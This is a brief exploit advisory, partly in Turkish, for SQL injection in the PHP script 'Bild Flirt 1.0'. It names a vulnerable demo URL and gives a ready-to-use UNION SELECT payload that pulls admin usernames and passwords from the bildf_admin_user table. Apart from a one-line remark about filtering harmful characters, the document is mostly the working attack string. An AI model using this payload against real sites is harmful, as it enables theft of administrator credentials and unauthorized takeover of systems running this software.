<------------------- header data start ------------------- >

#############################################################

# author : Fl0riX Bug Researchers

# Script Name : Bild Flirt 1.0

# Bug Type : SQL Injection

# Infection : Admin giris bilgileri alinabilir.

# Demo Vuln. :

http://www.media-products-demoserver.de/ph019/index.php?id=[SQL Inj.]

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

/index.php?id=-3+union+select+concat(user_name,0x3a,passwort)+from+bildf_admin_user

< -- bug code end of -- >